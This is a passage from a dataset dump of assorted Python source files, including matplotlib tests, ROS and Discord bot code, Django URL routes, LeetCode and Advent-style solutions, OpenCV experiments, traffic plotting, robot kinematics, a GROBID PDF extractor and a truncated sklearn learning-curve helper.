0.8, 0.8),\n )\n )\n plt.text(\n 2, 18, 'test5', size=20,\n ha='center', va='center', color='b',\n bbox=dict(\n boxstyle='darrow',\n ec=(1., 0.5, 0.5),\n fc=(1., 0.8, 0.8),\n )\n )\n plt.text(\n 1, 20, 'test6', size=20,\n ha='center', va='center', color='b',\n bbox=dict(\n boxstyle='circle',\n ec=(1., 0.5, 0.5),\n fc=(1., 0.8, 0.8),\n )\n )\n plt.text(\n 3, 23, 'test7', size=20,\n ha='center', va='center', color='b',\n bbox=dict(\n boxstyle='roundtooth',\n ec=(1., 0.5, 0.5),\n fc=(1., 0.8, 0.8),\n )\n )\n plt.text(\n 3, 20, 'test8', size=20,\n ha='center', va='center', color='b',\n bbox=dict(\n boxstyle='sawtooth',\n ec=(1., 0.5, 0.5),\n fc=(1., 0.8, 0.8),\n )\n )\n plt.plot(xxx, yyy, label='a graph')\n plt.legend()\n\n return fig\n\n\ndef test():\n phash = helpers.Phash(plot())\n assert phash.phash == '370da93449d3f64c', phash.get_details()\n return\n\n\nif __name__ == '__main__':\n plot()\n plt.show()\n # phash, _, _, _, _, _, _ = helpers.compute_phash(plot2())\n # print(phash)\n","sub_path":"test/test_text_overlay.py","file_name":"test_text_overlay.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"607121917","text":"#!/usr/bin/python\n\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import String\nfrom sound_play.libsoundplay import SoundClient\nfrom CorpusGenerator import CorpusGenerator\n\nclass ASRController():\n\n def __init__(self, corpGen):\n rospy.init_node('asr_controller')\n self.corpGen = corpGen\n self.soundhandle = SoundClient()\n rospy.sleep(1)\n self.voice = 'voice_don_diphone'\n self.volume = 1.0\n\n rospy.Subscriber('/grammar_data', String, self.parse_speech)\n rospy.spin()\n\n def parse_speech(self, speech_data):\n if speech_data.data.strip() in self.corpGen.listQuestions():\n answer = self.corpGen.getAnswer(speech_data.data.strip())\n rospy.loginfo('[SYNTHESIS] Matched Question')\n self.say(answer, voice=self.voice)\n\n def say(self, speech):\n self.soundhandle.say(speech)\n\nif __name__ == \"__main__\":\n namesFile = rospy.get_param(\"/asr_controller/namesFile\")\n objectsFile = rospy.get_param(\"/asr_controller/objectsFile\")\n locationsFile = rospy.get_param(\"/asr_controller/locationsFile\")\n gesturesFile = rospy.get_param(\"/asr_controller/gesturesFile\")\n questionsFile = rospy.get_param(\"/asr_controller/questionsFile\")\n \n corpGen = CorpusGenerator()\n corpGen.loadFiles(namesFile, objectsFile, locationsFile, gesturesFile, questionsFile)\n ASRController(corpGen)","sub_path":"ros_test/src/robocup_asr.py","file_name":"robocup_asr.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"107724649","text":"from html.parser import HTMLParser\n\nfrom urllib.request import urlopen, Request\n\nclass myParser (HTMLParser):\n def __init__(self):\n HTMLParser.__init__(self)\n self.n_polos = 0\n\n def handle_starttag(self, tag, attrs):\n if tag == 'p':\n for attr in attrs:\n if attr[0] == 'class' and attr[1] == 'item-polos':\n self.n_polos +=1\n\n def num_polos (self):\n return self.n_polos\n\ndef getSource(url):\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (khtml, like Gecko) Chrome/41.0.2228.0 Safari/537.3'}\n reg_url = \"https:xxxx0000\"\n req = Request (url = url, headers=headers)\n html = urlopen (req).read()\n return html.decode()\n\nhtml = getSource ('https://univesp.br/cursos/engenharia-de-computacao') \nparser = myParser()\nparser.feed(html)\nparser.num_polos \nprint(parser.n_polos)\n\n","sub_path":"busca_polos.py","file_name":"busca_polos.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"65352015","text":"from django import http\nfrom django.conf.urls import url\n\nfrom . import views\n\n\nurlpatterns = [\n url(r\"^$\", views.plog_index, name=\"plog_index\"),\n url(r\"^calendar/$\", views.calendar, name=\"calendar\"),\n url(r\"^calendar/data/$\", views.calendar_data, name=\"calendar_data\"),\n url(r\"^new-comments$\", views.new_comments, name=\"new_comments\"),\n url(r\"^prepare.json$\", views.prepare_json, name=\"prepare\"),\n url(r\"^preview.json$\", views.preview_json, name=\"preview\"),\n url(r\"^hits$\", views.plog_hits, name=\"plog_hits\"),\n url(r\"^hits/data$\", views.plog_hits_data, name=\"plog_hits_data\"),\n url(r\"^(.*)/submit$\", views.submit_json, name=\"submit\"),\n url(\n \"^(.*)/all-comments$\",\n views.all_blog_post_comments,\n name=\"all_plog_post_comments\",\n ),\n url(r\"^screenshot/(.*)\", views.blog_screenshot, name=\"blog_screenshot\"),\n url(\n r\"^(?P.*)/p(?P\\d+)/ping$\",\n views.blog_post_ping,\n name=\"blog_post_ping\",\n ),\n url(r\"^(?P.*)/ping$\", views.blog_post_ping, name=\"blog_post_ping\"),\n url(\n r\"^(?P.*)/p(?P\\d+)/awspa$\",\n views.blog_post_awspa,\n name=\"blog_post_awspa\",\n ),\n url(r\"^(?P.*)/awspa$\", views.blog_post_awspa, name=\"blog_post_awspa\"),\n url(\n r\"^(?P.*)/p(?P\\d+)/$\",\n lambda r, oid, page: http.HttpResponseRedirect(\"/{}/p{}\".format(oid, page)),\n ),\n url(r\"^(?P.*)/p(?P\\d+)$\", views.blog_post, name=\"blog_post\"),\n url(r\"^(?P.*)\", views.blog_post, name=\"blog_post\"),\n]\n","sub_path":"peterbecom/plog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"378564960","text":"from notbot.context import Context, Module\nfrom discord.ext import commands\nfrom typing import Union\nfrom discord import Member\nfrom .util import create_embed\n\nMODULE_NAME = \"personal_commands_module\"\n\n\nclass PersonalCommandsModule(commands.Cog, Module):\n def __init__(self, context: Context):\n self.bot = context.get_bot()\n self.kira = 441525718065872906\n\n def get_name(self):\n return MODULE_NAME\n\n @commands.command(name=\"judgement\", aliases=[\"judge\"])\n async def _judge(self, ctx, user: Union[Member]):\n if not ctx.author.id == self.kira:\n raise commands.BadArgument(\n \"You do not have the power to write the death note.\"\n )\n if not user:\n raise commands.BadArgument(\"You must write a name in the death note.\")\n embed = create_embed(self.bot)\n embed.description = (\n f\"I am the god of the new world! {user} is now written in the death note.\"\n )\n embed.set_image(\n url=\"https://cdn.discordapp.com/attachments/478869899499012096/596230452071890964/writesinnote.gif\"\n )\n await ctx.send(embed=embed)\n\n\ndef setup(bot):\n context: Context = bot.context\n\n info_module = context.get_module(MODULE_NAME)\n bot.add_cog(info_module)\n","sub_path":"notbot/cogs/personal_commands.py","file_name":"personal_commands.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"466182182","text":"import numpy as np\nimport pandas\n\ndata = pandas.read_csv(\"2018_Central_Park_Squirrel_Census_-_Squirrel_Data.csv\")\n\ncolor_set = set(data['Primary Fur Color'])\ncolor_set.remove(np.nan)\ncolor_dict = {\"Fur Color\": [], \"Count\": []}\nfor color in color_set:\n fur_color_group = data.groupby(data[\"Primary Fur Color\"] == color).count()[\"Primary Fur Color\"]\n color_dict[\"Fur Color\"].append(color)\n color_dict[\"Count\"].append(fur_color_group.loc[True])\n\nprint(color_dict)\npd_data = pandas.DataFrame(color_dict)\nprint(pd_data)\n\npd_data.to_csv('squirrel_count.csv')\n\n\n\n","sub_path":"pandas-intro/squirrel.py","file_name":"squirrel.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"448032781","text":"STEP = 394\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n def insert_after(self, value):\n x = Node(value)\n x.next = self.next\n self.next = x\n def __iter__(self):\n cur = self\n while cur is not None:\n yield cur.value\n cur = cur.next\n \ndef value_after(iterable, target):\n g = iter(iterable)\n for x in g:\n if x == target:\n break\n return next(g)\n\ndef create_buffer(step, rounds):\n start = cur = Node(0)\n cur.next = cur\n for i in range(1, rounds+1):\n for _ in range(step):\n cur = cur.next\n cur.insert_after(i)\n cur = cur.next\n return start\n\ndef number_following_zero(step, rounds):\n #two observations:\n #1. We can easily keep track of zero's index, and the state of the \n # index following it, without having to keep track of the value at any\n # other index. So we have O(1) memory consumption.\n #2. When the buffer has a size of at least `k*step` where k >= 2, \n # we can skip at least k-1 intermediate insertions, which can provide\n # substantial performance increases compared to the conventional approach,\n # when `rounds` is much larger than `step`. \n # Which it happens to be for part 2 :-)\n idx = 0\n x = None\n size = 1\n while size < rounds+1:\n insertions_this_loop = (size - idx) // step\n \n if idx == 0:\n x = size\n if insertions_this_loop > 0:\n size += insertions_this_loop\n idx = (idx + (step+1)*insertions_this_loop) % size\n else:\n size += 1\n idx = (idx + step + 1)% (size)\n return x\n\n#part 1\nbuf = create_buffer(STEP, 2017)\nprint(value_after(buf, 2017))\n\n#part 2\nprint(number_following_zero(STEP, 50000000))\n","sub_path":"day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"412606664","text":"# 1. 暴力法\n# 遍历每根柱子,查找left bound, right bound, 边界为比当前柱子高度高最多的柱子\n# 雨水量 = max(min(leftBound, rightBound) - current, 0)\n# [0] = min(0, 1) - 0 = 0\n# [1] = min(0, 2) - 1 = 0\n# [2] = min(1, 2) - 0 = 1\n# [3] = min(0, 3) - 2 = 0\n# [4] = min(2, 3) - 1 = 1\n# [5] = min(2, 3) - 0 = 2\n# [6] = min(2, 3) - 1 = 1\n# [7] = min(0, 0) - 3 = 0\n# [8] = min(3, 2) - 2 = 0\n# [9] = min(2, 2) - 1 = 1\n# [10] = min(3, 0) - 2 = 0\n# [11] = min(2, 0) - 1 = 0\n# \n# 2. 动态规划\n# 事先遍历保存左右边界,最后一趟遍历计算积水\n# 保存左右边界时使用动态规划:\n# Left[i] = max(Left[i-1], height[i-1])\n# Right[i] = max(Right[i+1], height[i+1])\n# 3. 栈\n# \n# 4. 双指针\n# \n# \nclass Solution:\n def trap(self, height: List[int]) -> int:\n # 1. 暴力法\n # size = len(height)\n # total = 0\n # for i in range(1, size-1):\n # leftBound = 0\n # rightBound = 0\n # for j in range(i-1, -1, -1):\n # if height[i] < height[j] and leftBound < height[j]:\n # leftBound = height[j]\n # for j in range(i+1, size):\n # if height[i] < height[j] and rightBound < height[j]:\n # rightBound = height[j]\n # area = min(leftBound, rightBound) - height[i]\n # area = max(area, 0)\n # total += area\n # return total\n\n # 2. 动态规划\n # total = 0\n # size = len(height)\n # left = [0]*size\n # right = [0]*size\n # for i in range(1, size):\n # left[i] = max(left[i-1], height[i-1])\n # for i in range(size-2, -1, -1):\n # right[i] = max(right[i+1], height[i+1])\n # for i in range(size):\n # area = max(min(left[i], right[i]) - height[i], 0)\n # total += area\n # return total\n\n # 3. 栈\n # total = 0\n # size = len(height)\n # if size <= 2:\n # return 0\n # stack = []\n # stack.append(0)\n # stack.append(1)\n # for i in range(2, size):\n # while stack and height[i] > height[stack[-1]]:\n # # 存在积水,进行计算\n # curr = stack.pop()\n # if stack:\n # heigh = min(height[stack[-1]], height[i]) - height[curr]\n # width = i - stack[-1] - 1\n # area = heigh * width\n # total += max(area, 0)\n # stack.append(i)\n # return total\n\n # 4. 双指针\n total = 0\n left = 0\n right = len(height) - 1\n leftBound = rightBound = 0\n while left <= right:\n leftBound = max(leftBound, height[left])\n rightBound = max(rightBound, height[right])\n if leftBound <= rightBound:\n total += leftBound - height[left]\n left +=1 \n else:\n total += rightBound - height[right]\n right -= 1\n return total","sub_path":"Week_02/G20200389010044/LeetCode_42_0044.py","file_name":"LeetCode_42_0044.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"400790030","text":"import cv2\nimport numpy as np\n\nimages = [\n cv2.imread('/Users/jhaip/Code/lovelace/src/standalone_processes/files/cv_tiles/up.png',0),\n cv2.imread('/Users/jhaip/Code/lovelace/src/standalone_processes/files/cv_tiles/down.png',0),\n cv2.imread('/Users/jhaip/Code/lovelace/src/standalone_processes/files/cv_tiles/right.png',0),\n cv2.imread('/Users/jhaip/Code/lovelace/src/standalone_processes/files/cv_tiles/left.png',0),\n cv2.imread('/Users/jhaip/Code/lovelace/src/standalone_processes/files/cv_tiles/loopstart.png',0),\n cv2.imread('/Users/jhaip/Code/lovelace/src/standalone_processes/files/cv_tiles/loopstop.png',0),\n]\n\ndef draw_style1():\n modimages = cv2.hconcat(images)\n cv2.imshow('style1', modimages)\n\ndef draw_style2():\n kernel = np.ones((5,5),np.uint8)\n modimages = []\n for m in images:\n t = cv2.erode(m,kernel,iterations=4)\n modimages.append(t)\n combined = cv2.hconcat(modimages)\n cv2.imshow('style2', combined)\n\ndef draw_style3():\n kernel = np.ones((3,3),np.uint8)\n modimages = []\n for m in images:\n t = cv2.erode(m,kernel,iterations=6)\n modimages.append(t)\n combined = cv2.hconcat(modimages)\n cv2.imshow('style3', combined)\n\ndef draw_style4():\n modimages = []\n for m in images:\n cdst = cv2.cvtColor(m, cv2.COLOR_GRAY2BGR)\n edges = cv2.Canny(m,50,150,apertureSize = 3)\n lines = cv2.HoughLines(edges,1,np.pi/180,25)\n if lines is not None:\n for line in lines:\n for rho,theta in line:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a*rho\n y0 = b*rho\n x1 = int(x0 + 1000*(-b))\n y1 = int(y0 + 1000*(a))\n x2 = int(x0 - 1000*(-b))\n y2 = int(y0 - 1000*(a))\n\n cv2.line(cdst,(x1,y1),(x2,y2),(0,0,255),2)\n modimages.append(cdst)\n combined = cv2.hconcat(modimages)\n cv2.imshow('lines', combined)\n\ndef draw_style5():\n modimages = []\n for m in images:\n size = np.size(m)\n skel = np.zeros(m.shape,np.uint8)\n element = cv2.getStructuringElement(cv2.MORPH_CROSS,(3,3))\n done = False\n while(not done):\n eroded = cv2.erode(m,element)\n temp = cv2.dilate(eroded,element)\n temp = cv2.subtract(m,temp)\n skel = cv2.bitwise_or(skel,temp)\n m = eroded.copy()\n\n zeros = size - cv2.countNonZero(m)\n if zeros==size:\n done = True\n modimages.append(skel)\n combined = cv2.hconcat(modimages)\n cv2.imshow('skel', combined)\n\ndef draw_contours():\n kernel = np.ones((7,7),np.uint8)\n modimages = []\n modimages2 = []\n for m in images:\n cdst = cv2.cvtColor(m, cv2.COLOR_GRAY2BGR)\n dilation = cv2.dilate(m,kernel,iterations = 1)\n image, contours, hierarchy = cv2.findContours(dilation,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) \n biggest_contours = sorted(contours, key = cv2.contourArea, reverse = True)[:1] # get largest contour\n # cdst = cv2.drawContours(cdst, contours, -1, (0,255,0), 3)\n cdst = cv2.drawContours(cdst, biggest_contours, -1, (0,255,0), 3)\n modimages.append(cdst)\n c = biggest_contours[0]\n # determine the most extreme points along the contour\n extLeft = tuple(c[c[:, :, 0].argmin()][0])\n extRight = tuple(c[c[:, :, 0].argmax()][0])\n extTop = tuple(c[c[:, :, 1].argmin()][0])\n extBot = tuple(c[c[:, :, 1].argmax()][0])\n cv2.rectangle(cdst,(extLeft[0],extTop[1]),(extRight[0],extBot[1]),(0,255,0),1)\n\n closing = cv2.morphologyEx(m, cv2.MORPH_CLOSE, kernel)\n erosion = cv2.erode(closing,kernel,iterations = 1)\n dilation_copy = m.copy()\n cropped = dilation_copy[extTop[1]:extBot[1], extLeft[0]:extRight[0]]\n dim = (40, 40)\n resized = cv2.resize(cropped, dim, interpolation = cv2.INTER_NEAREST)\n modimages2.append(resized)\n\n combined = cv2.hconcat(modimages)\n cv2.imshow('contours', combined)\n combined2 = cv2.hconcat(modimages2)\n cv2.imshow('contours_cropped', combined2)\n\n\n# cv2.imshow('image',img)\n# cv2.imshow('image1', erosion1)\n# cv2.imshow('image2',erosion10)\n# cv2.imshow('image3', erosion3)\n# cv2.imshow('erosion11', erosion11)\ndraw_style1()\ndraw_style2()\ndraw_style3()\ndraw_style4()\ndraw_style5()\ndraw_contours()\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"erode.py","file_name":"erode.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"157516386","text":"import matplotlib.pyplot as plt\nfrom datetime import datetime, timedelta\nimport csv\nimport sys\n\nPATH = '../csv/vehicles.csv'\nHOURS = 24\nday = 24\nmonth = 8\nstart_date = datetime(2019, month, day)\nend_date = start_date + timedelta(days=1)\n\ntraffic = [0] * HOURS\ntraffic_left = [0] * HOURS\ntraffic_right = [0] * HOURS\nabs_traffic = 0\navg_traffic_hour = 0\ntext_traffic = \"\"\n\navg_speed_hour = [0] * HOURS\navg_speed = 0\nmax_speed = 0\ntext_speed = \"\"\n\nfig = None\n\n\ndef main():\n global fig\n fig, ax1 = plt.subplots()\n ax2 = ax1.twinx()\n ax1.grid()\n\n plt.title(\"TRAFFIC VOLUME\\n\" + start_date.strftime(\"%d. %b %Y (%a)\"))\n # plt.tight_layout()\n\n ax1.set_xlabel('Hours')\n x_axis = [i for i in range(HOURS)]\n hours = []\n for i in range(HOURS):\n if i % 2 == 0:\n hour = (start_date + timedelta(hours=i)).strftime(\"%H:%M\")\n hours.append(hour)\n else:\n hours.append(\"\")\n plt.xticks(x_axis, hours)\n plt.gcf().autofmt_xdate()\n\n get_vehicles()\n\n set_text()\n plt.gcf().text(0.12, 0.9, text_traffic, fontweight=\"bold\")\n plt.gcf().text(0.24, 0.9, text_speed, fontweight=\"bold\")\n\n ax1.set_ylabel('Vehicles')\n ax1.set_yticks([i for i in range(600) if i % 50 == 0])\n\n line1, = ax1.plot(x_axis, traffic)\n line2, = ax1.plot(x_axis, [avg_traffic_hour] * HOURS, linestyle=\"--\", color=\"orange\")\n line3, = ax1.plot(x_axis, traffic_left, linestyle=\":\", color=\"green\")\n line4, = ax1.plot(x_axis, traffic_right, linestyle=\"-.\", color=\"red\")\n\n ax2.set_ylabel('Speed (km/h)')\n line5, = ax2.plot(x_axis, avg_speed_hour, linestyle=\":\", color=\"magenta\")\n ax2.set_yticks([i for i in range(100) if i % 10 == 0])\n\n plt.legend((line1, line2, line3, line4, line5), ('absolute', 'average', 'dir left (k)', 'dir right (w)', 'speed'))\n plt.show()\n\n\ndef get_vehicles():\n global traffic, traffic_left, traffic_right, avg_traffic_hour, avg_speed_hour, abs_traffic, avg_speed, max_speed\n speeds = [0] * HOURS\n speeds_traffic = [0] * HOURS\n max_speeds = [0] * 100\n with open(PATH) as file:\n csv_reader = csv.DictReader(file)\n for vehicle in csv_reader:\n timestamp = float(vehicle['first_seen'])\n date = datetime.fromtimestamp(timestamp)\n if date < start_date:\n continue\n elif date < end_date:\n hour = date.hour\n traffic[hour] += 1\n if vehicle['dir'] == 'left':\n traffic_left[hour] += 1\n else:\n traffic_right[hour] += 1\n try:\n vehicle_speed = float(vehicle['speed'])\n if 40 < vehicle_speed < 200:\n speeds[hour] += vehicle_speed\n speeds_traffic[hour] += 1\n min_speed = min(max_speeds)\n if min_speed < vehicle_speed < 200:\n for i in range(len(max_speeds)):\n if max_speeds[i] == min_speed:\n max_speeds[i] = vehicle_speed\n break\n except ValueError:\n continue\n elif date >= end_date:\n break\n abs_traffic = sum(traffic)\n avg_traffic_hour = int(abs_traffic / HOURS)\n sum_speeds_traffic = sum(speeds_traffic)\n if sum_speeds_traffic != 0:\n avg_speed_hour = list(map(lambda s, t: round(s / t, 2) if t > 3 else None, speeds, speeds_traffic))\n avg_speed = round(sum(speeds) / sum_speeds_traffic, 2)\n max_speed = round(sum(max_speeds) / len(max_speeds), 2)\n\n\ndef set_text():\n global text_traffic, text_speed\n if abs_traffic != 0:\n abs_traffic_left = sum(traffic_left)\n abs_traffic_right = sum(traffic_right)\n text_traffic = \"Vehicles total: \" + \"{:,}\".format(abs_traffic) \\\n + \"\\nLeft/right: \" + \"{:,}\".format(abs_traffic_left) + \"/{:,}\".format(abs_traffic_right) \\\n + \"\\nVehicles per hour: \" + \"{:,}\".format(avg_traffic_hour)\n text_speed = \"Speed avg: \" + \"{:,}\".format(avg_speed) + \" km/h\" \\\n + \"\\nSpeed max: \" + \"{:,}\".format(max_speed) + \" km/h\"\n\n\ndef set_dates():\n global day, month, start_date, end_date\n if len(sys.argv) == 2:\n day = int(sys.argv[1])\n elif len(sys.argv) == 3:\n day = int(sys.argv[1])\n month = int(sys.argv[2])\n start_date = datetime(2019, month, day)\n end_date = start_date + timedelta(days=1)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n set_dates()\n main()\n","sub_path":"plotters/vehicle_plotter_day.py","file_name":"vehicle_plotter_day.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"221014658","text":"import numpy as np\nfrom . import kin\nimport plotly.graph_objs as go\n\n# create the matrix to plot the robot arm\ndef calctrajectorymat(thetamat, robobj):\n\n i = 0\n nopoints = len(thetamat)\n trajectorymat = np.zeros((nopoints, robobj.jointno + 1, 3))\n\n while i < nopoints:\n trajectorymat[i] = kin.fwd(robobj, thetamat[i])\n i = i + 1\n\n return trajectorymat\n\n\n# create list of joint angles from initial to final position of the robot\ndef calctrac(robobj, thetainit, thetafinal, nopoints):\n\n thetamat = np.zeros((nopoints + 2, robobj.jointno))\n thetamat[0] = thetainit\n\n i = 1\n while i < nopoints + 2:\n j = 0\n while j < robobj.jointno:\n thetamat[i][j] = thetainit[j] + i*thetafinal[j]/(nopoints+1)\n j = j + 1\n i = i + 1\n\n return calctrajectorymat(thetamat, robobj)\n\n\ndef linetrac(robobj, pt1, pt2):\n x = np.linspace(pt1[0], pt2[0])\n y = np.linspace(pt1[1], pt2[1])\n z = np.linspace(pt1[2], pt2[2])\n\n i = 0\n thetamat = np.zeros((len(x), 3))\n\n while i < len(x):\n thetamat[i] = kin.inv(robobj, [x[i], y[i], z[i]])\n i = i + 1\n\n return calctrajectorymat(thetamat, robobj)\n\n\ndef viapts(robobj,mat):\n\n x_arr = []\n y_arr = []\n z_arr = []\n\n i = 0\n while i < len(mat):\n if(i == 0):\n start = mat[i]\n i = i + 1\n else:\n end = mat[i]\n x = np.linspace(start[0], end[0], 10)\n y = np.linspace(start[1], end[1], 10)\n z = np.linspace(start[2], end[2], 10)\n start = mat[i]\n i = i + 1\n x_arr = np.append(x_arr, x)\n y_arr = np.append(y_arr, y)\n z_arr = np.append(z_arr, z)\n\n i = 0\n thetamat = np.zeros((len(x_arr), 3))\n\n while i < len(x_arr):\n thetamat[i] = kin.inv(robobj, [x_arr[i], y_arr[i], z_arr[i]])\n i = i + 1\n\n return calctrajectorymat(thetamat, robobj)\n\n\n# Making the trajectory in 3D in plotly from the trajectory matrix\ndef trajectory_end(robobj, trajectorymat):\n\n nopoints = len(trajectorymat)\n\n x_array = np.zeros(nopoints)\n y_array = np.zeros(nopoints)\n z_array = np.zeros(nopoints)\n\n i = 0\n while i < nopoints:\n x_array[i] = trajectorymat[i][robobj.jointno][0]\n y_array[i] = trajectorymat[i][robobj.jointno][1]\n z_array[i] = trajectorymat[i][robobj.jointno][2]\n i = i + 1\n\n trac = go.Scatter3d(\n x=x_array, y=y_array, z=z_array,\n marker=dict(\n size=5,\n ),\n line=dict(\n color='#ff7f0e',\n width=2\n )\n )\n\n data = [trac]\n\n return data\n\n\n# Making the trajectory for joints in 3D in plotly from the trajectory matrix\ndef trajectory_joints(robobj, trajectorymat):\n\n nopoints = len(trajectorymat)\n\n x_array = np.zeros(nopoints)\n y_array = np.zeros(nopoints)\n z_array = np.zeros(nopoints)\n\n i = 0\n while i < nopoints:\n x_array[i] = trajectorymat[i][robobj.jointno - 1][0]\n y_array[i] = trajectorymat[i][robobj.jointno - 1][1]\n z_array[i] = trajectorymat[i][robobj.jointno - 1][2]\n i = i + 1\n\n trac = go.Scatter3d(\n x=x_array, y=y_array, z=z_array,\n marker=dict(\n size=5,\n ),\n line=dict(\n color='#ff7f0e',\n width=2\n )\n )\n\n data = [trac]\n\n return data\n\n\n","sub_path":"build/lib/kineticspy/trajectory.py","file_name":"trajectory.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"7573813","text":"class Solution:\n def largestRectangleArea(self, heights) -> int:\n heights = [0] + heights + [0]\n stack = [0]\n ans = 0\n for i in range(len(heights)):\n while stack and heights[i] < heights[stack[-1]]:\n ans = max(ans, heights[stack.pop()] * (i - stack[-1]-1))\n stack.append(i)\n return ans\n\n\nprint(Solution().largestRectangleArea([2, 1, 2]))\n","sub_path":"84.py","file_name":"84.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"35999334","text":"from bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport re\nimport os\n\n\ndef get_keywords(soup):\n keywords = soup.find('keywords')\n if keywords is not None:\n return \"

Keywords:

\" + keywords.text + \"

\"\n else:\n return \"

Keywords:

No Keywords found.

\"\n\ndef get_figures(soup):\n figures = soup.find_all('figure')\n if figures is not None:\n return len(figures)\n else:\n return 0\n \n\ndef get_links(soup):\n ptrs = soup.find_all(\"ptr\")\n\n links = []\n for ptr in ptrs:\n links.append(ptr[\"target\"])\n\n link_pattern = re.compile(r\"(?:(?:https?://|www\\.)\\S+|\\(https?://\\S+\\))\")\n paragraphs = soup.find_all(\"p\")\n for p in paragraphs:\n link_paragraphs = link_pattern.findall(p.text)\n for link in link_paragraphs:\n links.append(link)\n res = \"\"\n if str(len(links)) != 0:\n res += \"

Links found (\" + str(len(links)) + \"):

\"\n else:\n res= \"

No links found.

\"\n return res\n\nif __name__ == \"__main__\":\n\n def check_structure():\n if not os.path.exists(\"./input\"):\n print(\"Input directory does not exist.\")\n return False\n if not os.path.exists(\"./output\"):\n print(\"Output directory does not exist.\")\n return False\n print(\"Directory structure is OK.\")\n return True\n\n def check_output():\n if not os.path.exists(\"input/analysis.html\"):\n print(\"analysis.html file was not created.\")\n return False\n if not os.path.exists(\"input/figures_histogram.png\"):\n print(\"figures_histogram.png file was not created.\")\n return False\n print(\"analisys.html file created on the input/ directory.\")\n return True\n\n\n if check_structure():\n # This code will not be used if this module is imported, this is because of the tests, bcause they fail with the grobid client.\n from grobid_client.grobid_client import GrobidClient\n\n client = GrobidClient(config_path=\"config.json\")\n client.process(\"processFulltextDocument\", \"/input\", output=\"/output\", consolidate_citations=True, tei_coordinates=True, force=True)\n\n\n output_path = '/output/'\n output_file = 'input/analysis.html'\n output_file_figure = 'input/figures_histogram.png'\n\n if os.path.exists(output_file):\n os.remove(output_file)\n\n if os.path.exists(output_file_figure):\n os.remove(output_file_figure)\n\n num_figures = [] # list to store the number of figures for each file\n file_names = [] # list to store the name of each file\n\n with open(output_file, 'w') as file:\n for root, dirs, files in os.walk(output_path):\n for file_name in files + dirs:\n \n file_path = os.path.join(root, file_name)\n\n with open(file_path, 'r', encoding=\"utf-8\") as tei:\n soup = BeautifulSoup(tei, 'xml')\n file_display = str(file_path).removeprefix(\"/output/\").removesuffix(\".tei.xml\")\n file.write(\"

For file: \" + file_display + \"

\")\n \n file.write(get_keywords(soup))\n num_figures.append(get_figures(soup))\n file_names.append(file_display)\n file.write(get_links(soup))\n\n file.write(\"
\")\n\n plt.figure()\n plt.bar(file_names,num_figures, align='center') \n plt.xlabel('File names')\n plt.ylabel('Number of figures')\n plt.xticks(rotation=90)\n plt.savefig('input/figures_histogram.png')\n\n file.write(\"

Number of Figures Histogram:

\")\n file.write(\"\")\n check_output()","sub_path":"practica_1/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614721276","text":"annee = float(input(\"Donnez une année\"))\r\nannee = int(annee)\r\nresult = \"false\"\r\n\r\nif annee % 400 == 0 or (annee % 4 == 0 and annee % 100 != 0):\r\n result = \"true\"\r\n\r\nif result == \"true\":\r\n print(\"L'année est bisixtile\")\r\nelse:\r\n print(\"L'année n'est pas bisixtile\")\r\n\r\n\r\n","sub_path":"TP_Annebisixtile_v1.py","file_name":"TP_Annebisixtile_v1.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"91801145","text":"import numpy as np\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom sklearn.tree import DecisionTreeClassifier, plot_tree\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import learning_curve\nfrom sklearn.model_selection import validation_curve\nfrom sklearn.metrics import confusion_matrix\n\nimport time\nimport pandas as pd\nfrom sklearn.model_selection import GridSearchCV\nimport warnings\n\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None, n_jobs=None, train_sizes=np.linspace(0.2,1.0,10)):\n plt.figure()\n plt.title(title)\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n train_sizes, train_scores, test_scores = learning_curve(estimator, X, 